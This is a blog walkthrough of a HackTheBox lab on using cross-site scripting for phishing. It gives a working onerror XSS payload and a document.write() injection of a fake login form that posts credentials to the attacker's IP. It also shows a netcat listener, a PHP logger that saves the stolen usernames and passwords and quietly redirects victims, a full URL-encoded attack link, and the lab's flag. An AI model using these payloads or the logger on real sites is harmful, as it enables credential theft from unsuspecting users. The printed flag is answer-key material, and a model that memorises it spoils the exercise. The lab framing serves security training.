avatarHuy Phu

Summary

The article provides a detailed guide on using Cross-Site Scripting (XSS) to execute a phishing attack, including discovering XSS vulnerabilities, crafting a malicious login form, and capturing user credentials.

Abstract

The article discusses the prevalence of phishing as a primary method for attackers to deceive victims and outlines a method for leveraging XSS vulnerabilities to perform phishing attacks. It begins with the discovery of XSS vulnerabilities by testing payloads, such as <script>alert(1)</script>, and using tools like XSStrike to identify effective payloads. The article then demonstrates how to inject a malicious login form into a vulnerable application to capture user credentials. It provides code examples for the login form injection using document.write() and explains how to set up a netcat listener to receive the stolen credentials. The article also addresses potential user suspicions and suggests improvements to the attack by logging credentials and redirecting users without raising alarms. It concludes with a practical exercise for readers to apply the knowledge by finding a working XSS payload, injecting a malicious login form, and obtaining the flag through a simulated attack.

Opinions

  • The author emphasizes the effectiveness of XSS in phishing attacks due to its ability to deceive users into submitting sensitive information.
  • The use of automated tools like XSStrike is recommended for efficient discovery of XSS vulnerabilities.
  • Injecting a login form is presented as a practical method for capturing credentials, with the caveat that user experience should be considered to avoid suspicion.
  • The article suggests that the technical complexity of executing such attacks is worthwhile for the potential gains.
  • The author encourages readers to engage with the content by providing a hands-on exercise, indicating a didactic approach to cybersecurity education.
  • The conclusion implies that the content is aimed at beginners in the field of cybersecurity, with an acknowledgment that the technical aspects may be challenging but rewarding.

HackTheBox — XSS: Phishing

  • Phishing has become increasingly popular nowadays as it has been the main way for attackers to scam victims.
  • In this blog post, we will explore how to use XSS to perform a phishing attack.

XSS Discovery

  • Let’s try the <script>alert(1)</script> in the above application.
  • Nothing happens as we submite the payload. Let’s try some other payloads on the URL to see if the application is vulnerable.
  • We will try using XSS Striker to discover valid payloads.
git clone https://github.com/s0md3v/XSStrike.git
cd XSStrike
pip install -r requirements.txt
python XSStrike -u "http://$TARGET/phishing/index.php?url=<script>alert(1)<%2Fscript>"
  • Let’s try to discover the payload manually. Try input “Testing payload” and see where it is in the HTML body
  • The values seems to appear within the src attribute of the image tag.
  • Let’s try the following payload x’ onerror=alert(1) alt=’testing xss , which results in a complete image tag <img src=’x’ onerror=alert(1) alt=’testing xss’ >
  • The application does trigger the alert. We’ve found a valid payload.

Login Form Injection

  • Now that we have identified a valid payload, we can inject a Login form to the target so it will connect back to our server.
<h3>Please login to continue</h3>
<form action=http://OUR_IP>
    <input type="username" name="username" placeholder="Username">
    <input type="password" name="password" placeholder="Password">
    <input type="submit" name="submit" value="Login">
</form>
  • To inject this form, we use document.write() function. So the payload looks like:
document.write('<h3>Please login to continue</h3><form action=http://10.10.15.119:5555><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');
  • Replace the alert(1) in x’ onerror=alert(1) alt=’testing xss with the payload in the URL.
  • Set up Netcat listener: nc -lnvp 5555
  • Once the login form is injected, submit some random credentials. We should get a connection back to our server
  • As seen in the screenshot, not only did we get a connection back to our server, but we also obtained login credentials (test:pass).
  • In theory, this is how we steal credentials from users. However, the victim may get the “site can’t be reached” error, which will raise suspicions for users.
  • Hence, it is better to log users’ credentials and return them to the original page without any injections. The index.php should look like this
<?php
if (isset($_GET['username']) && isset($_GET['password'])) {
    $file = fopen("creds.txt", "a+");
    fputs($file, "Username: {$_GET['username']} | Password: {$_GET['password']}\n");
    header("Location: http://$TARGET/phishing/index.php");
    fclose($file);
    exit();
}
?>
  • Store index.php in /tmp/tmpservers in attacker server.
  • Start a PHP listener sudo php -S 0.0.0.0:8080
  • From the above payload, remember to change ther listening port. Submit the log in and we should get credentials from users
  • In the front end, users should return to /phishing/index.php page.

Answer the question

Try to find a working XSS payload for the Image URL form found at ‘/phishing’ in the above server, and then use what you learned in this section to prepare a malicious URL that injects a malicious login form. Then visit ‘/phishing/send.php’ to send the URL to the victim, and they will log into the malicious login form. If you did everything correctly, you should receive the victim’s login credentials, which you can use to login to ‘/phishing/login.php’ and obtain the flag.

  • Repeat the above steps. Once we have confirmed to retrieve the credentials, copy the whole url and pasted it into the URL field in send.php
http://10.129.56.135/phishing/index.php?url=x%27+onerror%3Ddocument.write%28%27%3Ch3%3EPlease+login+to+continue%3C%2Fh3%3E%3Cform+action%3Dhttp%3A%2F%2F10.10.15.160%3A8080%3E%3Cinput+type%3D%22username%22+name%3D%22username%22+placeholder%3D%22Username%22%3E%3Cinput+type%3D%22password%22+name%3D%22password%22+placeholder%3D%22Password%22%3E%3Cinput+type%3D%22submit%22+name%3D%22submit%22+value%3D%22Login%22%3E%3C%2Fform%3E%27%29+alt%3D%27testing+xss
  • We should get the credentials on our terminal
  • Log in with the credentials and we should get the flag.

Answer: HTB{r3f13c73d_cr3d5_84ck_2_m3}

CONCLUSION

  • That’s it for today. This is something really new and exciting for a lot of beginners. The technical aspect may be a little bit overwhelming but it is all worthy.
  • Please clap if you like my post and follow me for more Cybersecurity content.
Hackthebox
Xss Attack
Phishing
Web App Security
Owasp Top 10
Recommended from ReadMedium